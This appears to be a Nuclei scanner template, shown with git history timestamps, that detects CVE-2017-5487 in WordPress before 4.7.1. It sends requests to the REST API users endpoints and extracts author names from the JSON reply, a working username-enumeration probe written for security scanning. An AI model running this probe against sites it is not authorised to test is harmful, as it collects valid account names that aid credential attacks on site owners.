nuclei-templates/cves/2017/CVE-2017-5487.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2021-06-10 16:27:07 +00:00
id: CVE-2017-5487
info:
name: WordPress Core < 4.7.1 - Username Enumeration
2021-07-13 18:58:52 +00:00
author: Manas_Harsh,daffainfo,geeknik
severity: medium
2021-06-10 16:27:07 +00:00
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-5487
- https://www.exploit-db.com/exploits/41497
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2017-5487
cwe-id: CWE-200
2021-06-10 16:27:07 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/users/"
- "{{BaseURL}}/?rest_route=/wp/v2/users/"
2021-09-02 07:46:45 +00:00
2021-09-01 23:59:23 +00:00
stop-at-first-match: true
2021-06-10 16:27:07 +00:00
matchers-condition: and
matchers:
2022-03-26 11:15:50 +00:00
- type: status
status:
- 200
2021-07-13 18:58:52 +00:00
- type: word
part: header
words:
- "application/json"
2021-06-10 16:27:07 +00:00
- type: word
words:
- '"id":'
- '"name":'
- '"avatar_urls":'
2021-07-13 18:58:52 +00:00
condition: and
2021-09-02 07:46:45 +00:00
extractors:
2022-03-26 11:15:50 +00:00
- type: json
json:
- '.[].name'